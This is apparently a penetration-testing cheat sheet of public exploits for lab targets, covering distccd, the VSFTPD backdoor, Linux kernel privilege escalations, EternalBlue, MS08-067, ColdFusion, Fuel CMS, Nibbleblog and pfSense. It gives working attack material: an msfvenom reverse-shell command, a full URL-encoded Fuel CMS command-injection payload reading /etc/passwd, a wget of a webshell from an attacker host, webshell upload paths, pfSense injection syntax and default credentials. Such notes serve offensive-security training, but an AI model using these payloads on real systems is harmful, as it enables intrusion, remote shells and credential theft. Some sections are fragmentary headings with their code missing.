Public Exploits
distccd v1
Port: 3632
Description:
When not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands.
Metasploit Exploit: YES
VSFTPD v2.3.4
Backdoor Opens Port: 6200
Description:
When connecting to FTP, User Submits " :) ", triggers and opens a bind shell on port 6200.
Metasploit Exploit: YES
Kernel Exploits
Linnux 2.6.32 < 3.x (CentOS - x86)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04)
Requires:
PID of Udevd
Create /tmp/run. Exploit will run /tmp/run file
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation
Download link
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'
Link: https://www.exploit-db.com/exploits/47080
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)
Link:https://www.exploit-db.com/exploits/45010
Compile on local machine and run on target in case target does not have gcc.
Elastix 2.2
Default Credentials :
admin:admin
Intercept with Burp if faced with SSL Error.
Identify available extension using PBX enumeration if line is busy.
MS17-010 [Eternal Blue ]
EXPLOIT 1
Reference:https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/
EXPLOIT 2
Download mysmb.py since the exploit imports it. The download location is included in the exploit.
Use MSFvenom to create a reverse shell payload.
Make changes in the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]
Exploit :https://www.exploit-db.com/exploits/42315
searchsploit -m 42315
Generate Payload
Exploit Modification
Modify these two lines for smb_send_file and service_exec.
Uncomment the lines
Add the exploit file to send
Payload to execute from the client side.
Add Authentication Credentials
'guest' for anonymous login]
If the above does not work check with USERNAME = ' '
EXPLOIT 3
Payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > eternalblue.exe
Set up listener
Usage:
python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe
MS08-067
Create Shellcode
-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"
- The bad characters not to use. I got this from the comments in the python code.-f py
- Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.-v shellcode
- Have the code set the variableshellcode
, instead of the default,buf
. I want this to match what it’s called in the code I’m using.
Take this shellcode into the script, and paste it in replacing the default.
The exploit requires that I know the version of Windows and the Language pack:
ColdFusion 8
LFI
Grab the hash and crack it.
RCE through Scheduled Task:
Login -> Debugging&Logging -> Scheduled Tasks.
Scheduled task setup gives you the ability to download a file from a webserver and save the output locally.
Default Location Mapping from:
http://10.11.1.10/CFIDE/administrator/reports/index.cfm > ColdFusion Mappings
Create a reverse shell and host it on our server.
Set the below task config:
Task Name: Shell
URL: Webserver hosting the JSP shell
Check the box for Save output to a file
File:C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
After submitting we run the task on demand under Actions.
Set-up a listener and browse to
http://10.10.10.18:8080/CFIDE/shell.jsp
| --- CVE-2009-2265 --- |
- RCE through File Upload:
- Manual Exploitation
Use Burpsuite to forward the request
Payload should be in JSP format
This will create a file called ‘exp.cfm’, located in the ‘/userfiles/files/’ directory on the server.
| ---CVE-2018-15961--- |
Metasploit Module: https://packetstormsecurity.com/files/151095/Adobe-Coldfusion-11-CKEditor-Arbitrary-File-Upload.html
Webmin
File Dislosure [LFI]
http://<url>/unauthenticated/..%01 * 40
Fuel CMS 1.4 RCE
Fuel CMS 1.4 is affected by a Code Evaluation + SQLi vulnerability that can be chained for RCE.
Use Burp to intercept as payload output will be found in the source code.
Payload:
https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27
For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27
To get a Reverse shell:
wget http://<attackers-IP>/webshell.php -o shell.php
Set-up a listener & access
http://<target-IP>/shell.php
DotNetNuke [DNN]
Nibbleblog 4.0.3
Pre-requisites:
Admin credentials
Webshell [PHP]
Reference: CVE-2015-6967
Exploitation
Login to nibbleblog:
http://<IP>/nibbleblog/admin.php?controller=plugins
Upload PHP reverse shell:
http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Ignore errors
Access webshell at default location:
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
pfSense
Reference
Vulnerability arises because the '
|
' character is not filtered.Target URL:
<URL>/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
Pre-requisites:
Admin credentials [Default admin :: pfsense]
Exploitation
Python payload - > Converted to octal -> Few characters removed to avoid errors - > Saved to temp file on target - > executed by target server in php [printf]
Davfs2 1.4.6 Local Priv Esc
Hadoop Yarn RCE
Contents of test.json
Apache NiFi RCE
Exploit Script
Last updated